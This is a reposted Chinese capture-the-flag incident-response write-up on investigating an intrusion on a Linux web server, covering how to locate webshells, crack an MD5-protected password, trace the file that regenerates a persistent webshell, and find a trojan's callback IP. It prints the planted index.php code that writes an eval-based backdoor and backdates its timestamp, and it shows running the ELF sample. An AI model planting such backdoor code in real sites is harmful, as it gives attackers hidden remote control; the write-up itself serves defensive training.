【玄机】第一章-应急响应-Linux 入侵排查

admin 2024年5月24日23:28:51评论7 views字数 1724阅读5分44秒阅读模式

寻找木马密码

首先切换到网站目录/var/www/html,在这里其实直接就可以看到木马,名称为1.php【玄机】第一章-应急响应-Linux 入侵排查

还可以使用grepfind指令对敏感函数进行匹配,这里的密码就是POST函数中的值,即为 1,故最终 Flag 为 1

find ./ -name "*.php" | xargs grep "eval("
【玄机】第一章-应急响应-Linux 入侵排查

寻找不死马密码

这里依然是使用grepfind指令对敏感函数进行匹配,shell.php这里使用了 MD5 对木马进行加密,提取出的 MD5 为5d41402abc4b2a76b9719d911017c592【玄机】第一章-应急响应-Linux 入侵排查

解密 MD5 为hello【玄机】第一章-应急响应-Linux 入侵排查

寻找不死马文件

依然是根据上面的扫描结果进行分析,Flag 3 的目标是找到生成不死马的文件,这里的index.php中包含一个$code函数,生成了不死马【玄机】第一章-应急响应-Linux 入侵排查

index.php完整代码如下,分析完整代码我们便可以确定生成的不死马为shell.php,故 Flag 为index.php

<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
 $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
 Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
 Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

找出木马 IP

本题需要我们找到黑客留下的木马文件的服务器 IP,这里木马比较好判断,在 Linux 下,一般木马后缀都为elf,依然是在/var/www/html路径下,有一个'shell(1).elf'文件【玄机】第一章-应急响应-Linux 入侵排查

首先我们使用 Xftp 回传样本到本机(双击样本即可)【玄机】第一章-应急响应-Linux 入侵排查

这里样本分析其实可以直接放入在线沙箱进行分析,这里使用微步云沙箱进行演示,在【动态分析 > 网络行为】一项中,我们可以看到其对10.11.55.21产生了外联行为,故此 IP 就是服务器 IP,最终 Flag 为 10.11.55.21【玄机】第一章-应急响应-Linux 入侵排查

寻找恶意 IP 的开启端口

这里的手法上一题的 Flag 也同样适用,本题的处理思路为运行样本后对其网络行为进行监控,首先我们对样本进行提权,使所有用户都能无限制的访问此样本

chmod 777 'shell(1).elf'

之后运行此样本,让其产生外联行为(这里执行后终端会卡住,下一步需要另外开一个终端)

./'shell(1).elf'

之后查看其网络行为,可以看到外联的 IP 和端口

netstat -antlp|more

-a:显示所有的连接和监听端口。包括 TCP 和 UDP 的监听以及非监听状态的套接字
-n:以数字格式显示地址和端口号,而不是尝试解析主机名或端口名。这会加快输出速度
-t:仅显示 TCP 连接
-l:仅显示正在监听的套接字(即处于 LISTEN 状态的端口)
-p:显示使用这些连接的进程 ID 和进程名称。需要超级用户权限(root)才能看到其他用户的进程信息
【玄机】第一章-应急响应-Linux 入侵排查

原文始发于微信公众号(天禧信安):【玄机】第一章-应急响应-Linux 入侵排查

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月24日23:28:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【玄机】第一章-应急响应-Linux 入侵排查https://cn-sec.com/archives/2772574.html

发表评论

匿名网友 填写信息